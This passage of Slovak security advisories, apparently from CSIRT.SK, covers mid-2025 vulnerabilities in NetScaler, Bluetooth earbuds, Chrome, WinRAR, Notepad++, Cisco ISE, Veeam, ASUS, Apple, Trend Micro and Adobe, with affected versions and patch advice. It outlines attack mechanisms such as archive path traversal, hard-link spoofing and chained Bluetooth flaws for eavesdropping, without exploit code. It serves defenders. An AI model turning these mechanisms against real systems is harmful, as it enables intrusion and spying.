Pre systémy rodiny RHEL zasiahnuté CVE-2025-32462 odporúčame odstránenie všetkých pravidiel definovaných v súbore sudoers, ktoré sú určené pre iné systémy než pre lokálny systém. Pre prostredia používajúce LDAP použite úzko vytýčenú cestu vyhľadávania v konfigurácii SSSD, aby sa do výsledkov dopytu LDAP nezahrnuli pravidlá, ktoré sa na daný systém nevzťahujú.

Zdroje:

Zraniteľnosť Citrix NetScaler ADC and NetScaler Gateway

Marian Danko — Fri, 04 Jul 2025 12:22:11 +0000

Spoločnosť Citrix Systems varuje pred kritickou zraniteľnosťou v zariadeniach NetScaler ADC a NetScaler Gateway, ak sú nakonfigurované ako brána – t. j. VPN virtuálny server, ICA Proxy, CVPN, RDP Proxy – alebo ako AAA virtuálny server.

Zraniteľné systémy:

NetScaler ADC a NetScaler Gateway verzie 14.1 pred 14.1-47.46
NetScaler ADC a NetScaler Gateway verzie 13.1 pred 13.1-59.19
NetScaler ADC 13.1-FIPS a NDcPP pred 13.1-37.236-FIPS a NDcPP
Secure Private Access on-prem riešenia využívajúce inštancie NetScaler
Secure Private Access Hybrid riešenia využívajúce inštancie NetScaler

Pozn.: NetScaler ADC 12.1 FIPS nie je zasiahnutý touto zraniteľnosťou.

Opis zraniteľnosti:

CVE-2025-6543 (CVSS v4.0 skóre: 9.2)

Zraniteľnosť pretečenia pamäte, ktorá vedie k neúmyselnému presmerovaniu riadenia a k narušeniu dostupnosti služby, pokiaľ je zraniteľné zariadenie nakonfigurované ako Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) alebo virtuálny server AAA. Spoločnosť zámerne neuvádza bližšie informácie.

Možné škody:

Nedostupnosť služby (DoS)

Odporúčania:

Cloud Software Group, ktorej súčasťou je aj Citrix Systems, odporúča okamžitý update na relevatnú verziu:

NetScaler ADC a NetScaler Gateway 14.1-47.46 a neskoršie verzie
NetScaler ADC a NetScaler Gateway 13.1-59.19 a neskoršie verzie 13.1
NetScaler ADC 13.1-FIPS a 13.1-NDcPP 13.1-37.236 a neskoršie verzie 13.1-FIPS a 13.1-NDcPP

Ak pre dané zariadenie nie je teraz žiadna aktualizácia dostupná, výrobca odporúča nepoužívať ho.

Pozn.: Spoločnosť Citrix Systems v neskoršom prehlásení však upozorňuje, že užívateľom, ktorí aktualizujú svoj softvér na verzie 14.1-47.46 alebo 13.1-59.19, môžu nastať problémy s autentifikáciou. Prejavujú sa formou nefunkčnej prihlasovaciej stránky, najmä pri využívaní autentifikátorov ako DUO alebo SAML. Na odstránenie tohto problému ponúka návod na odkaze: https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694826

Zdroje:

Zraniteľnosť protokolu Bluetooth

Marian Danko — Fri, 04 Jul 2025 12:19:15 +0000

Zariadenia Bluetooth, ktoré obsahujú systémy na čipe (SoCs) od spoločnosti Airoha obsahujú zraniteľnosť, ktorá umožňuje čítanie a zápis do pamäte RAM a flash pamäte. Chýbajúca autentifikácia pri moduloch Bluetooth BR/EDR umožňuje útočníkovi komunikovať so zraniteľným zariadením bez párovania so zariadením.

Zraniteľné systémy:

Beyerdynamic Amiron 300
Bose QuietComfort Earbuds
EarisMax Bluetooth Auracast Sender
Jabra Elite 8 Active
JBL Endurance Race 2
JBL Live Buds 3
Jlab Epic Air Sport ANC
Marshall ACTON III
Marshall MAJOR V
Marshall MINOR IV
Marshall MOTIF II
Marshall STANMORE III
Marshall WOBURN III
MoerLabs EchoBeatz
Sony CH-720N
Sony Link Buds S
Sony ULT Wear
Sony WF-1000XM3
Sony WF-1000XM4
Sony WF-1000XM5
Sony WF-C500
Sony WF-C510-GFP
Sony WH-1000XM4
Sony WH-1000XM5
Sony WH-1000XM6
Sony WH-CH520
Sony WH-XB910N
Sony WI-C100
Teufel Tatws2

Opis zraniteľností:

CVE-2025-20700 (CVSS skóre: 6.7)

Chýbajúca autentifikácia pre GATT.

CVE-2025-20701 (CVSS skóre: 6.7)

Chýbajúca autentifikácia pre Bluetooth BR/EDR.

CVE-2025-20702 (CVSS skóre: 7.5)

Nedostatočné obmedzenie oprávnení vlastného protokolu.

Pokiaľ by boli zneužité všetky tri zraniteľnosti spolu, útočník môže prevziať kontrolu nad spojením medzi mobilným telefónom a audio Bluetooth zariadením a využiť Bluetooth profil Hands-Free (HFP) na odosielanie príkazov do telefónu. Ďalej môže odpočúvať konverzácie a zvuky v dosahu mikrofónu telefónu. Potenciálne hrozí aj možnosť prepísania firmvéru zraniteľného zariadenia, čo môže viesť k vzdialenému vykonaniu škodlivého kódu.

Bezpečnostný výskumníci však upozorňujú, že praktické možnosti implementácie týchto zraniteľností na útok sú obmedzené. Skutočný útok by zahŕňal aj mnoho prekážok ako napríklad obmedzený dosah signálu Bluetooth, ktorý je pri ideálnych podmienkach cca 10 metrov.

Pozn.: Zraniteľnosť objavili bezpečnostní výskumníci z nemeckej spoločnosti ERNW.

Možné škody:

Obídenie bezpečnostného prvku
Neoprávnený prístup k citlivým údajom

Odporúčania:

Užívateľom odporúčame aktualizovať firmvér zraniteľných zariadení . Pokiaľ sa počas používania skokovo stráca signál Bluetooth, odporúčame reštartovať zariadenie a počkať na spätné automatické pripojenie.

Zdroje:

Mesačný prehľad kritických zraniteľností jún 2025

Marian Danko — Fri, 04 Jul 2025 08:02:34 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci jún 2025.

Mesačný prehľad – 06/2025 PDF (557 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Aktívne zneužívaná zraniteľnosť Google Chrome

Marian Danko — Wed, 02 Jul 2025 13:52:41 +0000

Vývojári spoločnosti Google opravili vysoko závažnú aktívne zneužívanú zraniteľnosť v prehliadači Chrome, ktorá umožňuje spôsobiť pád aplikácie alebo získať schopnosť vykonávať ľubovoľný kód.

Zraniteľné systémy:

Google Chrome, verzie staršie ako 138.0.7204.96/.97 (Windows), 138.0.7204.92/.93 (Mac) a 138.0.7204.92 (Linux)

Opis činnosti:

CVE-2025-6554 (CVSS 3.1 skóre 8,1)

Spoločnosť Google opravila vysoko závažnú zraniteľnosť v prehliadači Chrome, ktorá umožňuje vzdialenému neautentifikovanému útočníkovi čítať a zapisovať mimo povolené hodnoty v pamäti, čo môže viesť k pádu aplikácie alebo schopnosti vykonávať ľubovoľný kód.

Zraniteľnosť súvisiaca so zámenou typu premennej sa nachádza v komponente V8. Pre jej zneužitie potrebuje útočník presvedčiť obeť, aby navštívila špeciálne vytvorenú webstránku.

Zraniteľnosť je aktívne zneužívaná. Objavil ju Clément Lecigne z tímu Google Threat Analysis Group (TAG).

Možné škody:

Vykonávanie ľubovoľného kódu
Nedostupnosť služby (DoS)

Odporúčania:

Bezodkladná aktualizácia Google Chrome aspoň na verziu 138.0.7204.96/.97 (Windows), 138.0.7204.92/.93 (Mac) a 138.0.7204.92 (Linux).

Odkazy:

Zraniteľnosť vo WinRAR umožňuje vzdialené vykonanie kódu

Marian Danko — Mon, 30 Jun 2025 13:17:13 +0000

Spoločnosť RARLAB vydala bezpečnostné aktualizácie svojho komprimačného nástroja WinRAR, ktoré opravujú vysoko závažnú zraniteľnosť verzií pre Windows. CVE-2025-6218 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

WinRAR pre Windows vo verziách 7.11 a starších

Opis zraniteľnosti:

CVE-2025-6218 (CVSS skóre 7,8)

Zraniteľnosť spočíva v chybnom spôsobe vyhodnocovania súborových ciest v rámci archívov. Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorených súborov mohol zneužiť na vzdialené vykonanie kódu v kontexte prihláseného používateľa. Rozbaľovaním archívov možno škodlivé súbory umiestniť do rôznych priečinkov na súborovom systéme, ako je napr. Windows Startup, ktorý obsahuje súbory spúšťané pri štarte systému.

Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí navštíviť škodlivú webovú stránku alebo otvoriť škodlivý súbor.

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Administrátorom a používateľom odporúčame vykonať aktualizáciu WinRAR na verziu 7.12.

Zdroje:

Zraniteľnosť v inštalátore Notepad++ možno zneužiť na eskaláciu privilégií

Marian Danko — Mon, 30 Jun 2025 13:14:59 +0000

Vývojári populárneho textového editora Notepad++ vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť v jeho inštalátore. CVE-2025-49144 možno lokálne zneužiť na eskaláciu privilégií na úroveň SYSTEM a vykonanie kódu.

Zraniteľné systémy:

Inštalátor Notepad++ vo verzii 8.8.1 a starších

Pozn.: Zraniteľné sú len inštalátory aplikácie a nie samotný textový editor.

Opis zraniteľnosti:

CVE-2025-49144 (CVSS skóre 7,3)

Vysoko závažnú zraniteľnosť s identifikátorom CVE-2025-49144 by lokálny autentifikovaný útočník mohol zneužiť na eskaláciu privilégií a vykonanie kódu s oprávneniami úrovne SYSTEM.

Vzdialené zneužitie zraniteľnosti je možné s interakciou používateľa, ktorého útočník presvedčí, aby stiahol zraniteľnú verziu inštalátora a škodlivý spustiteľný súbor do rovnakého priečinka a následne spustil inštalátor.

Na uvedenú zraniteľnosť je v súčasnosti dostupný tzv. Proof-of-Concept kód demonštrujúci spôsob jej zneužitia.

Možné škody:

Eskalácia privilégií
Vykonanie kódu

Odporúčania:

Administrátorom a používateľom odporúčame vykonať aktualizáciu Notepad++ na verziu 8.8.2.

Zdroje:

Kritické zraniteľnosti v Cisco ISE a ISE-PIC umožňujú vzdialené vykonanie príkazov

Marian Danko — Mon, 30 Jun 2025 13:12:56 +0000

Spoločnosť Cisco vydala bezpečnostné aktualizácie pre produkty Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC), ktoré opravujú tri kritické bezpečnostné zraniteľnosti. CVE-2025-20337, CVE-2025-20281 a CVE-2025-20282 by útočník mohol zneužiť na vzdialené vykonanie kódu v mene používateľa root a získanie úplnej kontroly nad systémom.
[Aktualizované 29.7.2025]
CISA zaradila všetky tri zraniteľnosti do zoznamu aktívne zneužívaných 28.7.2025.

Zraniteľné systémy:

Cisco ISE a ISE-PIC 3.3 bez inštalovanej záplaty Patch 7
Cisco ISE a ISE-PIC 3.4 bez inštalovanej záplaty Patch 2

Opis zraniteľnosti:

CVE-2025-20281 a CVE-2025-20337 (CVSS skóre 10,0)

Kritické zraniteľnosti spočívajú v nedostatočnom overovaní používateľských vstupov v rámci bližšie nešpecifikovaného ISE API rozhrania. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených API požiadaviek mohol zneužiť na získanie privilégií používateľa root a vzdialené vykonanie príkazov operačného systému zariadenia.

CVE-2025-20282 (CVSS skóre 10,0)

CVE-2025-2028 spočíva v absencii overovania nahrávaných súborov, čo možno zneužiť na ich nahratie do privilegovaných priečinkov na súborovom systéme zariadenia. Tak môže útočník získať možnosť eskalácie privilégií na úroveň používateľa root a vzdialene vykonávať kód.

Spoločnosť Cisco zaznamenala v júli 2025 prvé pokusy o zneužitie vyššie uvedených zraniteľností.

Možné škody:

Eskalácia privilégií
Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector odporúčame bezodkladnú inštaláciu záplat Patch 7 pre verziu 3.3 a Patch 2 pre verziu 3.4.

Zdroje:

Kritické zraniteľnosti v Citrix NetScaler ADC a NetScaler Gateway

Marian Danko — Tue, 24 Jun 2025 14:42:42 +0000

Spoločnosť Citrix vydala bezpečnostné aktualizácie na svoje produkty NetScaler ADC a NetScaler Gateway, ktoré opravujú 2 zraniteľnosti, z ktorých 1 je označená ako kritická. Aktívne zneužívanú CVE-2025-5777 možno zneužiť na získanie neoprávneného prístupu k citlivým údajom a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

NetScaler ADC a NetScaler Gateway 14.1 vo verziách starších ako 14.1-43.56
NetScaler ADC a NetScaler Gateway 13.1 vo verziách starších ako 13.1-58.32
NetScaler ADC 13.1-FIPS a NDcPP vo verziách starších ako 13.1-37.235-FIPS a NDcPP
NetScaler ADC 12.1-FIPS vo verziách starších ako 12.1-55.328-FIPS

Pozn.: Produkty NetScaler ADC a NetScaler Gateway vo verziách 12.1-X a 13.0-X už nie sú podporované a výrobca odporúča bezodkladnú aktualizáciu na verzie s platnou podporou.

Opis zraniteľnosti:

CVE-2025-5777 (CVSS 4.0 skóre 9,3)

Kritická zraniteľnosť s identifikátorom CVE-2025-5777 a názvom „Citrix Bleed 2“ spočíva v nedostatočnom overovaní vstupov, ktoré umožňuje čítanie pamäte mimo povolených hodnôt. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom (prihlasovacie údaje a konfigurácia) a obídeniu MFA.

Pozn.: Zraniteľnosť možno zneužiť len v prípade, že je NetScaler prevádzkovaný ako Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) alebo virtuálny AAA (Authentication, Authorization, and Accounting) server.

Pozn.2: Spoločnosť ReliaQuest disponuje indíciami, že zraniteľnosť je aktívne zneužívaná.

CVE-2025-5349 (CVSS 4.0 skóre 8,7)

Vysoko závažná zraniteľnosť CVE-2025-5349 spočíva v nesprávnom riadení prístupov v rámci NetScaler Management Interface a útočník nachádzajúci sa v rovnakom sieťovom segmente by ju mohol zneužiť na získanie neoprávneného prístupu do systému.

Pozn.: Úspešné zneužitie zraniteľnosti vyžaduje prístup k NSIP, Cluster Management IP alebo lokálnej GSLB Site IP.

Možné škody:

Neoprávnený prístup k citlivým údajom
Neoprávnený prístup do systému
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie špecifikované výrobcom, ktoré môžete nájsť v časti Zraniteľné systémy alebo na stránke výrobcu. Výrobca po aktualizácii všetkých NetScaler prevádzkovaných v HA pári alebo klastri odporúča ukončiť všetky aktívne ICA a PCoIP relácie prostredníctvom nasledujúcich príkazov:

kill icaconnection -all
kill pcoipConnection -all

[Aktualizácia 18.7.2025] Pre kontrolu prítomnosti indikátorov kompromitácie vo Vašom systéme môžete použiť aktualizovaný zoznam spoločnoti Greynoise, ktorý je dostupný po prihlásení.

Zdroje:

Kritická zraniteľnosť v produkte Veeam Backup & Replication

Marian Danko — Tue, 24 Jun 2025 14:41:31 +0000

Spoločnosť Veeam vydala bezpečnostné aktualizácie na svoj produkt Backup & Replication, ktoré opravujú 2 zraniteľnosti, z ktorých jedna je označená ako kritická. CVE-2025-23121 by vzdialený autentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

Veeam Backup & Replication vo verziách 12.3.1.1139 a starších

Opis zraniteľnosti:

CVE-2025-23121 (CVSS skóre 9,9)

Kritická zraniteľnosť by vzdialený autentifikovaný doménový používateľ mohol zneužiť na vzdialené vykonanie kódu s následkom úplného narušenia dôvernosti, integrity a dostupnosti systému. Zraniteľnosť je možné zneužiť len na inštanciách zapojených do domény.

CVE-2025-24286 (CVSS skóre 7,2)

Zraniteľnosť vysokej závažnosti by vzdialený autentifikovaný používateľ s oprávneniami Backup Operator mohol zneužiť na modifikáciu zálohovacích operácií a vykonanie ľubovoľného kódu.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnená zmena v systéme
Úplné narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu Veeam Backup & Replication na verziu 12.3.2.3617 alebo novšiu. V prípade, že prevádzkujete inštancie produktu zapojené do domény, odporúčame aplikovať best practice postupy, ktoré odporúča výrobca.

Zdroje:

Vysoko závažná zraniteľnosť v ASUS Armoury Crate

Marian Danko — Tue, 24 Jun 2025 14:40:26 +0000

Spoločnosť ASUS vydala bezpečnostné aktualizácie svojho softvéru pre manažment systému Armoury Crate, ktoré opravujú vysoko závažnú zraniteľnosť. Zraniteľnosť s identifikátorom CVE-2025-3464 možno zneužiť na eskaláciu privilégií a získanie administrátorského prístupu k systému.

Zraniteľné systémy:

ASUS Armoury Crate vo verziách V5.9.9.0 až V6.1.18.0

Opis zraniteľnosti:

CVE-2025-3464 (CVSS 4.0 skóre: 8,4)

Zraniteľnosť softvéru Armoury Crate sa nachádza v ovládači AsIO3.sys. Spočíva v súbehu procesov a skutočnosti, že ovládač overuje legitimitu volaní na základe napevno kódovaného SHA256 hashu súboru AsusCertService.exe. Lokálny autentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného „hard link“ odkazu mohol zneužiť na obídenie autorizácie, eskaláciu privilégií na úroveň používateľa SYSTEM a získanie úplnej kontroly nad systémom.

Pozn.: Zraniteľnosť objavili bezpečnostní výskumníci z Cisco Talos.

Možné škody:

Eskalácia privilégií
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu ASUS Armoury Crate na najnovšiu verziu.

Zdroje:

https://www.asus.com/content/asus-product-security-advisory/ (časť 06/16/2025 Security Update for Armoury Crate App)
https://talosintelligence.com/vulnerability_reports/TALOS-2025-2150
https://nvd.nist.gov/vuln/detail/CVE-2025-3464
https://www.bleepingcomputer.com/news/security/asus-armoury-crate-bug-lets-attackers-get-windows-admin-privileges/

Februárové zraniteľnosti v operačných systémoch Apple boli zneužité na inštaláciu špionážneho softvéru

Marian Danko — Tue, 24 Jun 2025 14:39:09 +0000

Spoločnosť Apple vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zraniteľnosť v operačných systémoch iOS a iPadOS. Zraniteľnosť s označením CVE-2025-24200 by útočník s fyzickým prístupom k uzamknutým zariadeniam mohol zneužiť na deaktiváciu bezpečnostného mechanizmu USB Restricted Mode.

Aktualizácia 19.06.2025: Spoločnosť Apple 11. júna 2025 doplnila popis aktualizácií iOS, iPadOS, macOS Ventura, macOS Sonoma, macOS Sequoia, watchOS a visionOS z 10. februára 2025 o zero-click zraniteľnosť s identifikátorom CVE-2025-43200. Zraniteľnosť bola podľa analýzy The Citizen Lab zneužitá na inštaláciu špionážneho softvéru Graphite od spoločnosti Paragon. Kompromitované mali byť mobilné zariadenia viacerých novinárov v Európe.

Zraniteľné systémy:

Zariadenia s operačným systémom iPadOS 17.X vo verzii staršej ako 17.7.5
Zariadenia s operačným systémom iPadOS 18.X vo verzii staršej ako 18.3.1
Zariadenia s operačným systémom iOS 18.X vo verzii staršej ako 18.3.1
Zariadenia s operačným systémom visionOS 2.X vo verzii staršej ako 2.3.1
Zariadenia s operačným systémom macOS Sequoia 15.X vo verzii staršej ako 15.3.1
Zariadenia s operačným systémom macOS Sonoma 14.X vo verzii staršej ako 14.7.4
Zariadenia s operačným systémom macOS Ventura 13.X vo verzii staršej ako 13.7.4
Zariadenia s operačným systémom watchOS 11.X vo verzii staršej ako 11.3.1

Opis zraniteľnosti:

CVE-2025-43200 (CVSS v4.0 skóre: -)

Zraniteľnosť v aplikácii Messages spočíva v logickej chybe pri spracovaní foto a video obsahu zdieľaného prostredníctvom odkazov na iCloud. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených súborov mohol zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad zariadením.

Pozn.: Jedná sa o aktívne zneužívanú tzv. zero-click zraniteľnosť, ktorej zneužitie nevyžaduje interakciu zo strany obete.

CVE-2025-24200 (CVSS v4.0 skóre: 7.0)

Bližšie nešpecifikovaný problém s autorizáciou by útočník s fyzickým prístupom k zariadeniu mohol zneužiť na deaktiváciu bezpečnostného mechanizmu USB Restricted Mode a to aj na uzamknutých zariadeniach. Uvedená funkcionalita po hodinovej nečinnosti zariadenia aktívne blokuje všetku komunikáciu s externým príslušenstvom, ktorú na prenik do systémov využívajú aj legitímne forenzné nástroje ako Cellebrite a Graykey.

Zraniteľnosť je v súčasnosti aktívne zneužívaná v rámci cielených útokov.

Možné škody:

Obídenie bezpečnostného prvku
Neoprávnený prístup k citlivým údajom
Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Spoločnosť Apple odporúča bezodkladnú aktualizáciu operačných systémov iPadOS na verziu 17.7.5 alebo 18.3.1, iOS na verziu 18.3.1, visionOS na verziu 2.3.1, macOS Sequoia na verziu 15.3.1, macOS Sonoma na verziu 14.7.4, macOS Ventura na verziu 13.7.4 a watchOS 11.X na verziu 11.3.1.

Zdroje:

Mesačná správa CSIRT.SK – máj 2025

Marian Danko — Thu, 19 Jun 2025 16:00:38 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci máj 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 05/2025 PDF (1 527 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Kritická a stredne závažné zraniteľnosti Cisco ISE a CCP s verejným exploitom

Marian Danko — Fri, 13 Jun 2025 14:38:56 +0000

Spoločnosť Cisco vydala bezpečnostné aktualizácie na produkty Identity Services Engine a Customer Collaboration Platform, ktoré opravujú viaceré bezpečnostné zraniteľnosti, pre ktoré existuje verejne dostupný kód exploitu. Tieto zraniteľnosti možno zneužiť na získanie neoprávneného prístupu do systému, vykonanie administratívnych zmien, nahrávanie súborov, či získanie citlivých údajov.

Zraniteľné systémy:

Cloudové inštancie Cisco Identity Services Engine (ISE)
- na AWS: verzie ISE 3.1 – 3.4
- na Azure: verzie ISE 3.2 – 3.4
- na OCI: verzie ISE 3.2 – 3.4
Cisco Cloud Platform (CCP) verzie staršie ako 15.0

Pozn.: Zraniteľnosť CVE-2025-20286 je zneužiteľná, pokiaľ je uzol Primary Administration pre Cisco ISE nasadený v cloude.

Opis zraniteľnosti:

CVE-2025-20286 (CVSS skóre 9,9)

Spoločnosť Cisco varuje pred zraniteľnosťou v systémoch Identity Services Engine (ISE), pre ktorú existuje verejne dostupný kód exploitu. Zraniteľnosť spočíva v nevhodne generovaných prihlasovacích údajoch pri nasadzovaní ISE na cloud. Zraniteľné sú cloudové nasadenia na AWS, Azure a OCI. Vzdialený útočník môže obísť autentifikáciu a získať neoprávnený prístup k systémom a dátam, obmedzene vykonávať administratívne operácie a ovplyvniť dostupnosť služieb.

On-premise verzie ISE nie sú ovplyvnené, podobne ako cloudové riešenia na Google Cloud VMware Engine, VMware cloud na AWS a na Azure VMware Solution (AVS).

CVE-2025-20129 (CVSSv3 4.3)

Zraniteľnosť CVE-2025-20129 umožňuje získavanie informácií z Cisco Customer Collaboration Platform (CCP) a súvisí s nevhodnou sanitizáciou požiadaviek http smerujúcich na webové chatové rozhranie. Vzdialený neautentifikovaný útočník ju môže zneužiť odoslaním špeciálne vytvorenej požiadavky HTTP na chatové rozhranie obete a presmerovať k sebe citlivé informácie.

Pre zraniteľnosť existuje verejne dostupný kód exploitu.

CVE-2025-20130 (CVSSv3 4.9)

Zraniteľnosť strednej závažnosti súvisí s nevhodným overovaním v rámci funkcie pre kopírovanie súborov. Umožňuje nahrávanie súborov na Cisco ISE a ISE-PIC odoslaním upravenej požiadavky na nahratie súboru na špecifický koncový bod API. Útočník potrebuje pre jej zneužitie administrátorské oprávnenia.

Pre zraniteľnosť existuje verejne dostupný kód exploitu.

Možné škody:

Únik citlivých údajov
Obídenie bezpečnostného prvku
Neoprávnený prístup do systému

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu Cisco ISE aspoň na verziu 3.3 P8 alebo 3.4 P3 a Cisco CCP aspoň na verziu 15.0.

Zdroje:

Kritické zraniteľnosti v Trend Micro Apex Central a Endpoint Encryption PolicyServer

Marian Danko — Fri, 13 Jun 2025 13:23:38 +0000

Spoločnosť Trend Micro vydala bezpečnostné aktualizácie na svoje produkty, ktoré opravujú viaceré kritické bezpečnostné zraniteľnosti. CVE-2025-49219 a CVE-2025-49220 v Apex Central možno zneužiť na vzdialené vykonanie kódu. CVE-2025-49216, CVE-2025-49212, CVE-2025-49213 a CVE-2025-49217 v Endpoint Encryption PolicyServer možno zneužiť na získanie neoprávneného prístupu do systému a vykonanie kódu.

Zraniteľné systémy:

Trend Micro Apex Central (on-prem) 2019 bez inštalovanej záplaty CP B7007
Trend Micro Apex Central as a Service vo verziách starších ako April 2025 Monthly Release
Trend Micro Endpoint Encryption (TMEE) PolicyServer vo verziách starších ako 6.0.0.4013 bez inštalovanej záplaty Patch 1 Update 6

Opis zraniteľnosti:

Trend Micro Apex Central:

CVE-2025-49219, CVE-2025-49220 (CVSS skóre 9,8)

Kritické zraniteľnosti spočívajú v absencii overovania používateľských vstupov v rámci metód GetReportDetailView (CVE-2025-49219) a ConvertFromJson (CVE-2025-49220). Vzdialený neautentifikovaný útočník by ich mohol zneužiť zaslaním špeciálne vytvorených vstupov, ktorých deserializácia vedie ku vzdialenému vykonanie kódu.

Trend Micro Endpoint Encryption PolicyServer:

CVE-2025-49216 (CVSS skóre 9,8)

Kritická zraniteľnosť spočíva v nesprávnej implementácii autentifikačného algoritmu používaného v rámci služby DbAppDomain. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na obídenie mechanizmov autentifikácie a získanie neoprávneného vstupu do systému s oprávneniami administrátora.

CVE-2025-49212, CVE-2025-49213, CVE-2025-49217 (CVSS skóre 9,8)

Kritické zraniteľnosti spočívajú v absencii overovania používateľských vstupov v rámci metód ValidateToken (CVE-2025-49217) a triedach PolicyServerWindowsService (CVE-2025-49213) a PolicyValueTableSerializationBinder (CVE-2025-49212). Vzdialený neautentifikovaný útočník by ich mohol zneužiť zaslaním špeciálne vytvorených vstupov, ktorých deserializácia môže viesť ku vzdialenému vykonaniu kódu.

Pozn.: Zreťazením uvedených zraniteľností možno získať úplnú kontrolu nad systémom.

Ostatné zraniteľnosti v produkte Endpoint Encryption PolicyServer možno zneužiť na realizáciu SQL injekcie a eskalácie privilégií (CVE-2025-49218, CVE-2025-49215 a CVE-2025-49211).

Možné škody:

Vzdialené vykonanie kódu
Obídenie bezpečnostného prvku
Neoprávnený prístup do systému
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú inštaláciu bezpečnostnej záplaty CP B7007 pre Apex Central a Patch 1 Update 6 pre Endpoint Encryption (TMEE) PolicyServer.

Zdroje:

Kritické bezpečnostné zraniteľnosti v produktoch Adobe

Marian Danko — Fri, 13 Jun 2025 13:20:29 +0000

Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty InCopy, Experience Manager, Commerce, InDesign, Substance 3D Sampler, Acrobat Reader a Substance 3D Painter, ktoré opravujú 252 zraniteľností, z čoho 18 je označených ako kritických. Kritické zraniteľnosti by vzdialený útočník mohol zneužiť na obídenie bezpečnostných prvkov, eskaláciu privilégií a vykonanie kódu.

Zraniteľné systémy:

Adobe InCopy vo verziách starších ako 20.3
Adobe InCopy vo verziách starších ako 19.5.4
Adobe Experience Manager (AEM)  vo verziách starších ako AEM Cloud Service Release 2025.5
Adobe Experience Manager (AEM)  vo verziách starších ako 6.5.23
Adobe Commerce 2.4.9 vo verziách starších ako 2.4.9
Adobe Commerce 2.4.8  vo verziách starších ako 2.4.8-p1
Adobe Commerce 2.4.7  vo verziách starších ako 2.4.7-p6
Adobe Commerce 2.4.6  vo verziách starších ako 2.4.6-p11
Adobe Commerce 2.4.5  vo verziách starších ako 2.4.5-p13
Adobe Commerce 2.4.4  vo verziách starších ako 2.4.4-p14
Adobe Commerce B2B 1.5.3vo verziách starších ako 1.5.3-alpha1
Adobe Commerce B2B 1.5.2 vo verziách starších ako 1.5.2-p1
Adobe Commerce B2B 1.4.2 vo verziách starších ako 1.4.2-p6
Adobe Commerce B2B 1.3.4 vo verziách starších ako 1.3.4-p13
Adobe Commerce B2B 1.3.3 vo verziách starších ako 1.3.3-p14
Magento Open Source 2.4.9 vo verziách starších ako 2.4.9-alpha1
Magento Open Source 2.4.8 vo verziách starších ako 2.4.8-p1
Magento Open Source 2.4.7 vo verziách starších ako 2.4.7-p6
Magento Open Source 2.4.6 vo verziách starších ako 2.4.6-p11
Magento Open Source 2.4.5 vo verziách starších ako 2.4.5-p13
Adobe Commerce and Magento Open Source bez inštalovaného patchu pre CVE-2025-47110
Adobe InDesign vo verziách starších ako ID20.3
Adobe InDesign vo verziách starších ako ID19.5.4
Adobe Substance 3D Sampler vo verziách starších ako 5.0.3
Acrobat DC, Acrobat Reader DC vo verziách starších ako 25.001.20531 (Win)
Acrobat DC, Acrobat Reader DC vo verziách starších ako 25.001.20529 (Mac)
Acrobat 2024 vo verziách starších ako 24.001.30254
Acrobat 2020 vo verziách starších ako 20.005.30774
Acrobat Reader 2020 vo verziách starších ako 20.005.30774
Adobe Substance 3D Painter vo verziách starších ako 11.0.2

Opis zraniteľnosti:

Adobe InCopy:

CVE-2025-30327, CVE-2025-47107 (CVSS skóre 7,8)

Zraniteľnosti spočívajúce v pretečení medzipamäte haldy (CVE-2025-47107) a pretečení celočíselnej hodnoty (CVE-2025-30327) možno zneužiť na vykonanie kódu.

Adobe Experience Manager:

CVE-2025-46840 (CVSS skóre 8,7), CVE-2025-46837 (CVSS skóre 7,1)

Kritické zraniteľnosti spočívajúce v nesprávnej autorizácii (CVE-2025-46840) a nedostatočnom overovaní používateľských vstupov (CVE-2025-46837) možno zneužiť na eskaláciu privilégií a vykonanie kódu.

Adobe Commerce, Adobe Commerce B2B, Magento Open Source:

CVE-2025-47110 (CVSS skóre 9,1)

CVE-2025-47110 by vzdialený autentifikovaný útočník mohol zneužiť na realizáciu XSS (Cross Site Scripting) útokov a úplné narušenie dôvernosti, integrity a dostupnosti systému. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.

